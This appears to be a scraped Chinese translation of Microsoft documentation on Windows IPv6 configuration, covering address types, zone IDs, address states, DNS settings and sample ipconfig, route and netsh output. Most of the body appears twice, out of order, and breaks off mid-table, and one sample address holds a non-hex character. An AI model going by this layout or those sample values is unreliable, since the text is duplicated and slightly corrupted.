•链路本地 (Link-local) 地址 类似自动专用 IP 寻址 (APIPA) 地址 (169.254.0.0/16),链路本地地址用于特定的链路。链路本地地址通常以“fe80”开头。
•站点本地 (Site-local) 地址 类似专用 IPv4 地址,站点本地地址用于企业的 Intranet,并可重复用于企业的不同站点。站点本地地址通常以“fec”、“fed”、“fee”或“fef”开头。RFC 3879 并不推荐使用站点本地地址,但是这种地址可用于当今的 IPv6 实现。
链路本地地址和站点本地地址被称为本地使用的地址。
接口 ID(单播 IPv6 地址的最后 64 位)可以:
•基于已安装的网络适配器的 IEEE 802 地址
IEEE 802 地址(通常称为媒体访问控制 [MAC] 地址)共有 48 位,分配给每个网络适配器。扩展唯一标识符 (EUI)-64 地址是一种较新的 64 位 MAC 地址。IEEE 802 地址可以转换为 EUI-64 地址。单播 IPv6 地址的接口 ID 可以基于网络适配器的 EUI-64 地址。
•随机生成
RFC 3041 定义了临时的 IPv6 地址,这些地址使用一个随机生成的接口 ID 和一个相对较短的有效生命期。临时 IPv6 地址通常由发起通信的客户端应用程序(比如:Web 浏览器)使用,并且不在 DNS 中进行注册。公共 IPv6 地址通常由服务器应用程序(比如:Web 服务器)用于传入的连接,并且不在 DNS 中进行注册。公共 IPv6 地址可拥有随机生成的或基于 EUI-64 的接口 ID。
本地使用的 IPv6 地址的区域 ID
不同于全局地址,链路本地和站点本地地址前缀均可以重复使用。链路本地地址前缀重复用于每个链路。站点本地地址前缀可重复用于企业的每个站点。由于地址前缀可重复使用,因此链路本地和站点本地地址并不明确。为了对链路或站点分别指定链路本地地址或站点本地地址,IPv6 使用了另一个称为区域标识符 (ID)(也称为作用域 ID)的标识符。区域 ID 可指定区域,即具有指定作用域的网络连接部分。
RFC 4007 中指定用于识别与本地使用的地址相关联的区域的语法如下:
地址%区域_ID
地址 是本地使用的地址,而 区域_ID 则是代表区域的整数值。区域 ID 的值是根据主机来定义的。因此,不同的主机可能会对相同的物理区域,确定不同的区域 ID 值。譬如,主机 A 可能选择数字 3 来代表一个附加链路的区域,而主机 B 可能会选择数字 4 来代表相同的链路。
对于基于 Windows 的 IPv6 主机,本地使用的地址的区域 ID 定义如下:
•对于链路本地地址,区域 ID 通常为分配了地址或用作链路本地目标的发送接口的接口的接口索引。接口索引是分配给 IPv6 接口(包含一个环回以及一个或多个隧道或 LAN 接口)的以数字 1 起始的整数。可以通过 netsh interface ipv6 show interface 命令,查看接口索引列表。
•对于站点本地地址,区域 ID 就是站点 ID,即分配给企业站点的整数值。对于不重复使用站点本地地址前缀的企业,站点 ID 被默认设为 1,并且无需指定。可以通过 netsh interface ipv6 show address level=verbose 命令,查看站点 ID。
使用 Windows 工具和区域 ID 的具体示例如下:
•ping fe80::2b0:d0ff:fee9:4143%3
此处,3 为附加在包含目标地址的链路上的接口的接口索引。
•tracert fec0::f282:2b0:d0ff:fee9:4143%2
此处,2 为包含目标地址的企业站点的站点 ID。
有关区域 ID 如何表示为分配地址的一部分的具体例子,请在本文中参阅“Ipconfig.exe 工具中的 IPv6 配置”部分的内容。
IPv6 地址的状态
IPv6 主机一般通过与路由器交互并执行无状态 IPv6 地址自动配置,自动配置 IPv6 地址。验证完唯一性之后,自动配置的地址可能有以下这几种状态:
•有效 通过唯一性验证的地址,可用于发送和接收单播流量。自动配置的地址拥有路由器分配的有效生命期。
•首选 可用于新通信的有效地址。自动配置的地址拥有路由器分配的首选生命期。
•已否决 不可用于新通信的有效地址。现有的通信会话仍可使用已否决的地址。
•无效 无法再供节点用于发送或接收流量的地址。在有效的生命期到期后,地址将进入无效的状态。
IPv6 默认路由器
正如 IPv4 主机,IPv6 主机通常在其子网(用于接收所有远程流量)上,配置有一个或多个路由器的地址。在 IPv6 中,默认路由器自动通过路由器发现进行配置,并且默认路由器的地址即 IPv6 路由器在本地子网上的接口的链路本地地址。默认路由器的配置还在 IPv6 路由表中,创建了一个默认路由。对于通过多个接口执行路由器发现的 IPv6 节点(比如使用 LAN 连接和站内自动隧道寻址协议 [ISATAP]),路由表中将有多个默认路由器和多个默认路由。
IPv6 DNS 设置
根据主机配置以及 DNS 和路由基础结构,基于 Windows 的主机可通过 IPv4 或 IPv6,将 DNS 查询发送给 DNS 服务器。默认情况下,基于 Windows 的主机使用动态主机配置协议 (DHCP) 对 DNS 服务器配置的 IPv4 地址,通过 IPv4 发送 DNS 查询。运行 Windows XP、Windows Server 2003、Windows Vista 或 Windows Server“Longhorn”的计算机可使用以下地址,通过 IPv6 发送 DNS 查询:
•DNS 服务器的本地配置的单播地址
使用 netsh interface ipv6 add dns 命令,对主机配置 DNS 服务器的 IPv6 地址。对于运行 Windows Vista 或 Windows Server“Longhorn”的计算机,可以在“连接和适配器”文件夹中,通过 Internet 协议版本 6 (TCP/IPv6) 组件的属性,配置具有 IPv6 地址的 DNS 服务器。
•DNS 服务器的已知单播地址(fec0:0:0:ffff::1、fec0:0:0:ffff::2 和 fec0:0:0:ffff::3)
对 DNS 服务器手动配置已知单播地址,并对路由基础结构添加主路由,从而可以从运行 Windows XP、Windows Server 2003、Windows Vista 或 Windows Server“Longhorn”的 IPv6 主机访问 DNS 服务器。
Windows Vista 和 Windows Server“Longhorn”支持面向 IPv6 的动态主机配置协议 (DHCPv6)。可通过 DNS 递归名称服务器 DHCPv6 选项,分配 DNS 服务器的 IPv6 地址。这是对运行 Windows Vista 或 Windows Server“Longhorn”的计算机配置 DNS 服务器 IPv6 地址的首选方法。
Ipconfig.exe 工具提供的 IPv6 配置信息
下面几个小节介绍了针对 Windows XP SP2 和 Windows Vista 的 Ipconfig.exe 工具所显示的 IPv6 配置示例。
针对 Windows XP SP2 的 Ipconfig.exe
下面为 ipconfig 命令在运行 Windows XP SP2 的计算机上,所显示的信息示例:
Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix .: ecoast.example.com IP Address.. . . . . . . . . . . : 157.60.14.21 Subnet Mask .. . . . . . . . . . : 255.255.255.0 IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:3c06:7c4c:8215:bc8 IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:c850:21fe:3cd7:adeb IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:79aa:6d7b:5c5c:6bd IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:204:5aff:fe56:f5b IP Address.. . . . . . . . . . . : fe80::204:5aff:fe56:f5b%4 Default Gateway .. . . . . . . . : 157.60.14.1 fe80::20a:42ff:feb0:5400%4 Tunnel adapter Teredo Tunneling Pseudo-Interface: Connection-specific DNS Suffix .: IP Address.. . . . . . . . . . . : fe80::5445:5245:444f%6 Default Gateway . . . . . . . . . : Tunnel adapter Automatic Tunneling Pseudo-Interface: Connection-specific DNS Suffix .: ecoast.example.com IP Address.. . . . . . . . . . . : fec0::6ab4:0:5efe:157.60.14.21%1 IP Address.. . . . . . . . . . . : 3ffe:ffff:908c:f70f:0:5efe:157.60.14 .21 IP Address.. . . . . . . . . . . : fe80::5efe:157.60.14.21%2 Default Gateway .. . . . . . . . : fe80::5efe:131.107.25.1%2
以下几个小节分析了每个接口的 IPv6 配置。
Ethernet adapter Local Area Connection(以太网适配器本地连接)
对于分配给 Local Area Connection 接口的 IPv6 地址,前四个都是全局地址,而最后一个则是链路本地地址。在四个全局地址中,前三个都是临时地址,而最后一个则是公共地址。可以通过查看地址的第六和第七个字符块是否包含“ff:fe”(表示基于 EUI-64 的接口 ID),确定哪个地址为公共地址。Ipconfig 命令所显示的链路本地地址 (fe80::204:5aff:fe56:f5b%4) 包含链路本地地址 (fe80::204:5aff:fe56:f5b) 以及分配了该地址的接口的区域 ID (%4)(Local Area Connection 接口的接口索引)。
在 ipconfig 命令所显示的信息中,通过该接口分配的默认路由器(显示为默认网关) (fe80::20a:42ff:feb0:5400%4) 包含默认路由器的链路本地地址 (fe80::20a:42ff:feb0:5400) 以及可通过其访问该地址的接口的区域 ID (%4)。
Tunnel adapter Teredo Tunneling Pseudo-Interface(隧道适配器 Teredo 隧道虚拟接口)
该隧道适配器面向 Teredo—— 一种通过网络地址转换器 (NAT) 发送 IPv4 封装的 IPv6 数据包的 IPv6 转换技术。对于该主机,Teredo 并未处于活动状态,而且对隧道适配器 Teredo 隧道虚拟接口分配了链路本地地址 fe80::5445:5245:444f 以及针对 Teredo 隧道接口的区域 ID 6。
Tunnel adapter Automatic Tunneling Pseudo-Interface(隧道适配器自动隧道虚拟接口)
该隧道适配器面向 ISATAP—— 一种通过 Intranet 发送 IPv4 封装的 IPv6 数据包的 IPv6 转换技术。第一个 IPv6 地址为站点本地地址,区域 ID 为 1,表示该地址所属的站点 ID。第二个地址为全局地址,而第三个地址则为链路本地地址,其区域 ID 为 2,表示自动隧道虚拟接口的接口索引。
针对 Windows Vista 的 Ipconfig.exe
下面为 ipconfig 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix .: ecoast.example.com IPv6 Address.. . . . . . . . . . : 3ffe:ffff:21da:7:713e:a426:d167:37ab Temporary IPv6 Address.. . . . . : 3ffe:ffff:21da:7:5099:ba54:9881:2e54 Link-local IPv6 Address .. . . . : fe80::713e:a426:d167:37ab%6 IPv4 Address.. . . . . . . . . . : 157.60.14.11 Subnet Mask .. . . . . . . . . . : 255.255.255.0 Default Gateway .. . . . . . . . : fe80::20a:42ff:feb0:5400%6 157.60.14.1 Tunnel adapter Local Area Connection* 6: Connection-specific DNS Suffix .: IPv6 Address.. . . . . . . . . . : 3ffe:ffff:908c:f70f:0:5efe:157.60.14.11 Link-local IPv6 Address .. . . . : fe80::5efe:157.60.14.11%9 Site-local IPv6 Address .. . . . : fec0::6ab4:0:5efe:157.60.14.11%1 Default Gateway .. . . . . . . . : fe80::5efe:131.107.25.1%9 fe80::5efe:131.107.25.2%9 Tunnel adapter Local Area Connection* 7: Media State .. . . . . . . . . . : Media disconnected Connection-specific DNS Suffix .:
在 Windows Vista 中,Ipconfig.exe 所显示的 IPv6 地址信息有了很大的改观。下面几个小节分析了每个接口的 IPv6 配置。
Ethernet adapter Local Area Connection
Ipconfig.exe 如今将 IPv6 地址显示在 IPv4 地址之前,并使用下列标签,指明 IPv6 地址的类型:
•IPv6 Address 公共 IPv6 地址。与 Windows XP SP2 不一样,Windows Vista 对公共和链路本地 IPv6 地址,默认使用随机派生的接口 ID。
•Temporary IPv6 Address 具有较短的有效生命期且带有随机派生的接口 ID 的全局地址。
•Link-local IPv6 Address 带有相应的区域 ID(接口索引)的链路本地地址。
•Site-local IPv6 Address 带有相应的区域 ID(站点 ID)的站点本地地址。
Tunnel adapter Local Area Connection* 6
该隧道适配器面向 ISATAP——由“5efe”和点分十进制格式的 IPv4 地址表示在每个分配地址的接口 ID 部分中。第一个 IPv6 地址为公共地址。第二个地址为链路本地地址,其区域 ID 为 9,表示 Local Area Connection* 6 接口的接口索引(接口名称中的“*”表示隧道接口)。第三个 IPv6 地址为站点本地地址,区域 ID 为 1,表示该地址所属的站点 ID。
Tunnel adapter Local Area Connection* 7
该隧道适配器用于 Teredo。对于该主机,Teredo 已被禁用,而接口处于断开连接的状态下。
Route.exe 工具提供的 IPv6 配置信息
在 Windows Server 2003、Windows Vista 和 Windows Server“Longhorn”中,可以使用 Route.exe 工具,显示 IPv6 路由表。以下为针对 Windows Server 2003 的 route print 命令所显示的信息示例的 IPv6 部分:
IPv6 Route Table =========================================================================== Interface List 4 ...00 04 5a 56 0f a4 ......Linksys LNE100TX Fast Ethernet Adapter(LNE100TX v4) 3 ...00 04 76 36 ............6to4 Pseudo-Interface 2 ...9d 3b 8e c7 ............Automatic Tunneling Pseudo- Interface 1 ...........................Loopback Pseudo-Interface =========================================================================== =========================================================================== Active Routes:If Metric Network Destination Gateway 2 1008 fec0:0:0:f70f::/64 On-link 2 1008 3ffe:ffff:831:f70f::/64 On-link 2 1256 ::/0 fe80::5efe:131.107.253.8 2 1004 fec0::f70f:0:5efe:157.60.142.19/128 fec0::f70f:0:5efe:157.60.142.19 2 1004 3ffe:ffff:831:f70f:0:5efe:157.60.142.19/128 3ffe:ffff:831:f70f:0:5efe:157.60.142.19 2 1004 fe80::5efe:157.60.142.19/128 fe80::5efe:157.60.142.19 4 1004 3ffe:ffff:28:2:713e:a426:d167:37ab/128 3ffe:ffff:28:2:713e:a426:d167:37ab 4 1008 3ffe:ffff:28:2::/64 On-link 4 1008 ::/0 fe80::20a:42ff:feb0:5400 2 1004 fe80::5efe:131.107.17.19/128 fe80::5efe:131.107.17.19 2 1004 fe80::5efe:192.168.21.211/128 fe80::5efe:192.168.21.211 4 1008 ff00::/8 On-link 4 1004 fe80::713e:a426:d167:37ab/128 fe80::713e:a426:d167:37ab 1 1004 ::1/128 ::1 1 1008 ff00::/8 On-link 1 1004 fe80::1/128 fe80::1 =========================================================================== Persistent Routes:None
上述显示信息的第一部分列出了各个 IPv6 接口及其接口索引。第二部分列出了各个路由,这些路由可分类如下:
•前缀长度为 128 位 (/128) 的路由为特定 IPv6 目标的主路由。默认情况下,只有本地配置的 IPv6 地址的主路由位于 IPv6 路由表中。
•前缀长度为 64 位 (/64) 的路由为本地附加子网的子网路由。
•::/0 路由为默认路由。
•ff00::/8 为多播流量的路由。
有关 IPv6 路由表和 IPv6 路由确定过程的详细信息,请参阅“认识 IPv6 路由表”。
Netsh.exe 工具提供的 IPv6 配置信息
还可以通过在 netsh 工具的 netsh interface ipv6 上下文中,使用以下命令获取 IPv6 配置信息:
•netsh interface ipv6 show address
•netsh interface ipv6 show interface
•netsh interface ipv6 show routes
有关 Netsh 工具的详细信息,请参阅“通过 Netsh 管理 Windows 2000 网络组件”。
Netsh interface ipv6 show address 命令
Netsh interface ipv6 show address 命令可显示分配给每个接口的 IPv6 地址、地址的类型、重复地址检测 (DAD) 状态(首选或已否决)以及有效和首选的生命期。下面为 netsh interface ipv6 show address 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Interface 1:Loopback Pseudo-Interface 1 Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Other Preferred infinite infinite ::1 Interface 9:Local Area Connection* 6 Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Other Deprecated infinite infinite fe80::5efe:1.0.0.127%9 Interface 6:Local Area Connection Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Public Preferred 29d23h59m59s 6d23h59m59s 3ffe:ffff:21da:7:1f3e:9e51:2178:b9ob Temporary Preferred 5d19h59m25s 5d19h59m25s 3ffe:ffff:21da:7:a299:85ae:21da:59cc Other Preferred infinite infinite fe80::713e:a426:d167:37ab%6 Interface 10:Local Area Connection* 7 Addr Type DAD State Valid Life Pref. Life Address --------- ----------- ---------- ---------- ------------------------ Other Deprecated infinite infinite fe80::5efe:1.0.0.127%10
Netsh interface ipv6 show interface 命令
Netsh interface ipv6 show interface 命令可显示 IPv6 接口的列表,其中包括接口索引、接口跃点数、最大传输单位 (MTU)、状态和名称。下面为 netsh interface ipv6 show interface 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Idx Met MTU State Name --- --- --- -- ----------- ------------------- 1 50 4294967295 enabled Loopback Pseudo-Interface 1 9 50 1280 enabled Local Area Connection* 6 6 20 1500 enabled Local Area Connection 10 50 1280 enabled Local Area Connection* 7 7 10 1500 disabled Local Area Connection 2
Netsh interface ipv6 show routes 命令
Netsh interface ipv6 show routes 命令可显示 IPv6 路由表,并包含有关路由是否已发布(若计算机充当广告路由器)和路由类型的信息。下面为 netsh interface ipv6 show route 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Publish Type Met Prefix Idx Gateway/Interface Name ------- -------- --- ------------------------ --- ------------------- ----- No 0 0 ::/0 6 fe80::20a:42ff:feb0:5400 No Manual 1 ::1/128 1 Loopback Pseudo-Interface 1 No 0 0 3ffe:ffff:21da:7::/64 6 Local Area Connection No Manual 1 3ffe:ffff:21da:7:1f3e:9e51:2178:b9ob/128 6 Local Area Connection No Manual 1 3ffe:ffff:21da:7:a299:85ae:21da:59cc/128 6 Local Area Connection No Manual 1 fe80::/64 6 Local Area Connection No Manual 1 fe80::/64 10 Local Area Connection* 7 No Manual 1 fe80::/64 9 Local Area Connection* 6 No Manual 1 fe80::5efe:1.0.0.127/128 10 Local Area Connection* 7 No Manual 1 fe80::5efe:1.0.0.127/128 9 Local Area Connection* 6 No Manual 1 fe80::713e:a426:d167:37ab/128 6 Local Area Connection
介绍 IPv6 配置
IPv6 配置主要由以下几个部分组成:
•分配给每个接口的 IPv6 地址
•默认路由器(IPv4 中称为默认网关)
•域名系统 (DNS) 设置(比如:DNS 服务器和名称注册行为)
不同于典型的 IPv4 节点,典型的 IPv6 节点拥有多个接口(LAN 和隧道接口)以及分配给每个接口的多个地址。
注意:IPv6 并不使用网络基本输入/输出系统 (NetBIOS)。所以,IPv6 配置不需要 NetBIOS 设置或 Windows Internet Name Service (WINS) 服务器的地址。
IPv6 地址
IPv6 中的地址配置比 IPv4 更加复杂,因为存在着不同类型的 IPv6 地址,并且这些地址可以不同的状态存在。
不同类型的 IPv6 地址
对 IPv6 定义的地址类型如下:
•全局地址 类似公共 IPv4 地址,IPv6 全局地址在 Internet 的 IPv6 部分中全局可访问。全局 IPv6 地址通常以“2”或“3”开头。
•链路本地 (Link-local) 地址 类似自动专用 IP 寻址 (APIPA) 地址 (169.254.0.0/16),链路本地地址用于特定的链路。链路本地地址通常以“fe80”开头。
•站点本地 (Site-local) 地址 类似专用 IPv4 地址,站点本地地址用于企业的 Intranet,并可重复用于企业的不同站点。站点本地地址通常以“fec”、“fed”、“fee”或“fef”开头。RFC 3879 并不推荐使用站点本地地址,但是这种地址可用于当今的 IPv6 实现。
链路本地地址和站点本地地址被称为本地使用的地址。
接口 ID(单播 IPv6 地址的最后 64 位)可以:
•基于已安装的网络适配器的 IEEE 802 地址
IEEE 802 地址(通常称为媒体访问控制 [MAC] 地址)共有 48 位,分配给每个网络适配器。扩展唯一标识符 (EUI)-64 地址是一种较新的 64 位 MAC 地址。IEEE 802 地址可以转换为 EUI-64 地址。单播 IPv6 地址的接口 ID 可以基于网络适配器的 EUI-64 地址。
•随机生成
RFC 3041 定义了临时的 IPv6 地址,这些地址使用一个随机生成的接口 ID 和一个相对较短的有效生命期。临时 IPv6 地址通常由发起通信的客户端应用程序(比如:Web 浏览器)使用,并且不在 DNS 中进行注册。公共 IPv6 地址通常由服务器应用程序(比如:Web 服务器)用于传入的连接,并且不在 DNS 中进行注册。公共 IPv6 地址可拥有随机生成的或基于 EUI-64 的接口 ID。
本地使用的 IPv6 地址的区域 ID
不同于全局地址,链路本地和站点本地地址前缀均可以重复使用。链路本地地址前缀重复用于每个链路。站点本地地址前缀可重复用于企业的每个站点。由于地址前缀可重复使用,因此链路本地和站点本地地址并不明确。为了对链路或站点分别指定链路本地地址或站点本地地址,IPv6 使用了另一个称为区域标识符 (ID)(也称为作用域 ID)的标识符。区域 ID 可指定区域,即具有指定作用域的网络连接部分。
RFC 4007 中指定用于识别与本地使用的地址相关联的区域的语法如下:
地址%区域_ID
地址 是本地使用的地址,而 区域_ID 则是代表区域的整数值。区域 ID 的值是根据主机来定义的。因此,不同的主机可能会对相同的物理区域,确定不同的区域 ID 值。譬如,主机 A 可能选择数字 3 来代表一个附加链路的区域,而主机 B 可能会选择数字 4 来代表相同的链路。
对于基于 Windows 的 IPv6 主机,本地使用的地址的区域 ID 定义如下:
•对于链路本地地址,区域 ID 通常为分配了地址或用作链路本地目标的发送接口的接口的接口索引。接口索引是分配给 IPv6 接口(包含一个环回以及一个或多个隧道或 LAN 接口)的以数字 1 起始的整数。可以通过 netsh interface ipv6 show interface 命令,查看接口索引列表。
•对于站点本地地址,区域 ID 就是站点 ID,即分配给企业站点的整数值。对于不重复使用站点本地地址前缀的企业,站点 ID 被默认设为 1,并且无需指定。可以通过 netsh interface ipv6 show address level=verbose 命令,查看站点 ID。
使用 Windows 工具和区域 ID 的具体示例如下:
•ping fe80::2b0:d0ff:fee9:4143%3
此处,3 为附加在包含目标地址的链路上的接口的接口索引。
•tracert fec0::f282:2b0:d0ff:fee9:4143%2
此处,2 为包含目标地址的企业站点的站点 ID。
有关区域 ID 如何表示为分配地址的一部分的具体例子,请在本文中参阅“Ipconfig.exe 工具中的 IPv6 配置”部分的内容。
IPv6 地址的状态
IPv6 主机一般通过与路由器交互并执行无状态 IPv6 地址自动配置,自动配置 IPv6 地址。验证完唯一性之后,自动配置的地址可能有以下这几种状态:
•有效 通过唯一性验证的地址,可用于发送和接收单播流量。自动配置的地址拥有路由器分配的有效生命期。
•首选 可用于新通信的有效地址。自动配置的地址拥有路由器分配的首选生命期。
•已否决 不可用于新通信的有效地址。现有的通信会话仍可使用已否决的地址。
•无效 无法再供节点用于发送或接收流量的地址。在有效的生命期到期后,地址将进入无效的状态。
IPv6 默认路由器
正如 IPv4 主机,IPv6 主机通常在其子网(用于接收所有远程流量)上,配置有一个或多个路由器的地址。在 IPv6 中,默认路由器自动通过路由器发现进行配置,并且默认路由器的地址即 IPv6 路由器在本地子网上的接口的链路本地地址。默认路由器的配置还在 IPv6 路由表中,创建了一个默认路由。对于通过多个接口执行路由器发现的 IPv6 节点(比如使用 LAN 连接和站内自动隧道寻址协议 [ISATAP]),路由表中将有多个默认路由器和多个默认路由。
IPv6 DNS 设置
根据主机配置以及 DNS 和路由基础结构,基于 Windows 的主机可通过 IPv4 或 IPv6,将 DNS 查询发送给 DNS 服务器。默认情况下,基于 Windows 的主机使用动态主机配置协议 (DHCP) 对 DNS 服务器配置的 IPv4 地址,通过 IPv4 发送 DNS 查询。运行 Windows XP、Windows Server 2003、Windows Vista 或 Windows Server“Longhorn”的计算机可使用以下地址,通过 IPv6 发送 DNS 查询:
•DNS 服务器的本地配置的单播地址
使用 netsh interface ipv6 add dns 命令,对主机配置 DNS 服务器的 IPv6 地址。对于运行 Windows Vista 或 Windows Server“Longhorn”的计算机,可以在“连接和适配器”文件夹中,通过 Internet 协议版本 6 (TCP/IPv6) 组件的属性,配置具有 IPv6 地址的 DNS 服务器。
•DNS 服务器的已知单播地址(fec0:0:0:ffff::1、fec0:0:0:ffff::2 和 fec0:0:0:ffff::3)
对 DNS 服务器手动配置已知单播地址,并对路由基础结构添加主路由,从而可以从运行 Windows XP、Windows Server 2003、Windows Vista 或 Windows Server“Longhorn”的 IPv6 主机访问 DNS 服务器。
Windows Vista 和 Windows Server“Longhorn”支持面向 IPv6 的动态主机配置协议 (DHCPv6)。可通过 DNS 递归名称服务器 DHCPv6 选项,分配 DNS 服务器的 IPv6 地址。这是对运行 Windows Vista 或 Windows Server“Longhorn”的计算机配置 DNS 服务器 IPv6 地址的首选方法。
Ipconfig.exe 工具提供的 IPv6 配置信息
下面几个小节介绍了针对 Windows XP SP2 和 Windows Vista 的 Ipconfig.exe 工具所显示的 IPv6 配置示例。
针对 Windows XP SP2 的 Ipconfig.exe
下面为 ipconfig 命令在运行 Windows XP SP2 的计算机上,所显示的信息示例:
Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix .: ecoast.example.com IP Address.. . . . . . . . . . . : 157.60.14.21 Subnet Mask .. . . . . . . . . . : 255.255.255.0 IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:3c06:7c4c:8215:bc8 IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:c850:21fe:3cd7:adeb IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:79aa:6d7b:5c5c:6bd IP Address.. . . . . . . . . . . : 3ffe:ffff:21da:7:204:5aff:fe56:f5b IP Address.. . . . . . . . . . . : fe80::204:5aff:fe56:f5b%4 Default Gateway .. . . . . . . . : 157.60.14.1 fe80::20a:42ff:feb0:5400%4 Tunnel adapter Teredo Tunneling Pseudo-Interface: Connection-specific DNS Suffix .: IP Address.. . . . . . . . . . . : fe80::5445:5245:444f%6 Default Gateway . . . . . . . . . : Tunnel adapter Automatic Tunneling Pseudo-Interface: Connection-specific DNS Suffix .: ecoast.example.com IP Address.. . . . . . . . . . . : fec0::6ab4:0:5efe:157.60.14.21%1 IP Address.. . . . . . . . . . . : 3ffe:ffff:908c:f70f:0:5efe:157.60.14 .21 IP Address.. . . . . . . . . . . : fe80::5efe:157.60.14.21%2 Default Gateway .. . . . . . . . : fe80::5efe:131.107.25.1%2
以下几个小节分析了每个接口的 IPv6 配置。
Ethernet adapter Local Area Connection(以太网适配器本地连接)
对于分配给 Local Area Connection 接口的 IPv6 地址,前四个都是全局地址,而最后一个则是链路本地地址。在四个全局地址中,前三个都是临时地址,而最后一个则是公共地址。可以通过查看地址的第六和第七个字符块是否包含“ff:fe”(表示基于 EUI-64 的接口 ID),确定哪个地址为公共地址。Ipconfig 命令所显示的链路本地地址 (fe80::204:5aff:fe56:f5b%4) 包含链路本地地址 (fe80::204:5aff:fe56:f5b) 以及分配了该地址的接口的区域 ID (%4)(Local Area Connection 接口的接口索引)。
在 ipconfig 命令所显示的信息中,通过该接口分配的默认路由器(显示为默认网关) (fe80::20a:42ff:feb0:5400%4) 包含默认路由器的链路本地地址 (fe80::20a:42ff:feb0:5400) 以及可通过其访问该地址的接口的区域 ID (%4)。
Tunnel adapter Teredo Tunneling Pseudo-Interface(隧道适配器 Teredo 隧道虚拟接口)
该隧道适配器面向 Teredo—— 一种通过网络地址转换器 (NAT) 发送 IPv4 封装的 IPv6 数据包的 IPv6 转换技术。对于该主机,Teredo 并未处于活动状态,而且对隧道适配器 Teredo 隧道虚拟接口分配了链路本地地址 fe80::5445:5245:444f 以及针对 Teredo 隧道接口的区域 ID 6。
Tunnel adapter Automatic Tunneling Pseudo-Interface(隧道适配器自动隧道虚拟接口)
该隧道适配器面向 ISATAP—— 一种通过 Intranet 发送 IPv4 封装的 IPv6 数据包的 IPv6 转换技术。第一个 IPv6 地址为站点本地地址,区域 ID 为 1,表示该地址所属的站点 ID。第二个地址为全局地址,而第三个地址则为链路本地地址,其区域 ID 为 2,表示自动隧道虚拟接口的接口索引。
针对 Windows Vista 的 Ipconfig.exe
下面为 ipconfig 命令在运行 Windows Vista 的计算机上,所显示的信息示例:
Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix .: ecoast.example.com IPv6 Address.. . . . . . . . . . : 3ffe:ffff:21da:7:713e:a426:d167:37ab Temporary IPv6 Address.. . . . . : 3ffe:ffff:21da:7:5099:ba54:9881:2e54 Link-local IPv6 Address .. . . . : fe80::713e:a426:d167:37ab%6 IPv4 Address.. . . . . . . . . . : 157.60.14.11 Subnet Mask .. . . . . . . . . . : 255.255.255.0 Default Gateway .. . . . . . . . : fe80::20a:42ff:feb0:5400%6 157.60.14.1 Tunnel adapter Local Area Connection* 6: Connection-specific DNS Suffix .: IPv6 Address.. . . . . . . . . . : 3ffe:ffff:908c:f70f:0:5efe:157.60.14.11 Link-local IPv6 Address .. . . . : fe80::5efe:157.60.14.11%9 Site-local IPv6 Address .. . . . : fec0::6ab4:0:5efe:157.60.14.11%1 Default Gateway .. . . . . . . . : fe80::5efe:131.107.25.1%9 fe80::5efe:131.107.25.2%9 Tunnel adapter Local Area Connection* 7: Media State .. . . . . . . . . . : Media disconnected Connection-specific DNS Suffix .:
在 Windows Vista 中,Ipconfig.exe 所显示的 IPv6 地址信息有了很大的改观。下面几个小节分析了每个接口的 IPv6 配置。
Ethernet adapter Local Area Connection
Ipconfig.exe 如今将 IPv6 地址显示在 IPv4 地址之前,并使用下列标签,指明 IPv6 地址的类型:
•IPv6 Address 公共 IPv6 地址。与 Windows XP SP2 不一样,Windows Vista 对公共和链路本地 IPv6 地址,默认使用随机派生的接口 ID。
•Temporary IPv6 Address 具有较短的有效生命期且带有随机派生的接口 ID 的全局地址。
•Link-local IPv6 Address 带有相应的区域 ID(接口索引)的链路本地地址。
•Site-local IPv6 Address 带有相应的区域 ID(站点 ID)的站点本地地址。
Tunnel adapter Local Area Connection* 6
该隧道适配器面向 ISATAP——由“5efe”和点分十进制格式的 IPv4 地址表示在每个分配地址的接口 ID 部分中。第一个 IPv6 地址为公共地址。第二个地址为链路本地地址,其区域 ID 为 9,表示 Local Area Connection* 6 接口的接口索引(接口名称中的“*”表示隧道接口)。第三个 IPv6 地址为站点本地地址,区域 ID 为 1,表示该地址所属的站点 ID。
Tunnel adapter Local Area Connection* 7
该隧道适配器用于 Teredo。对于该主机,Teredo 已被禁用,而接口处于断开连接的状态下。
Route.exe 工具提供的 IPv6 配置信息
在 Windows Server 2003、Windows Vista 和 Windows Server“Longhorn”中,可以使用 Route.exe 工具,显示 IPv6 路由表。以下为针对 Windows Server 2003 的 route print 命令所显示的信息示例的 IPv6 部分:
IPv6 Route Table =========================================================================== Interface List 4 ...00 04 5a 56 0f a4 ......Linksys LNE100TX Fast Ethernet Adapter(LNE100TX v4) 3 ...00 04 76 36 ............6to4 Pseudo-Interface 2 ...9d 3b 8e c7 ............Automatic Tunneling Pseudo- Interface 1 ...........................Loopback Pseudo-Interface =========================================================================== =========================================================================== Active Routes:If Metric Network Destination Gateway 2 1008 fec0:0:0:f70f::/64 On-link 2 1008 3ffe:ffff:831:f70f::/64 On-link 2 1256 ::/0 fe80::5efe:131.107.253.8 2 1004 fec0::f70f:0:5efe:157.60.142.19/128 fec0::f70f:0:5efe:157.60.142.19 2 1004 3ffe:ffff:831:f70f:0:5efe:157.60.142.19/128 3ffe:ffff:831:f70f:0:5efe:157.60.142.19 2 1004 fe80::5efe:157.60.142.19/128 fe80::5efe:157.60.142.19 4 1004 3ffe:ffff:28:2:713e:a426:d167:37ab/128 3ffe:ffff:28:2:713e:a426:d167:37ab 4 1008 3ffe:ffff:28:2::/64 On-link 4 1008 ::/0 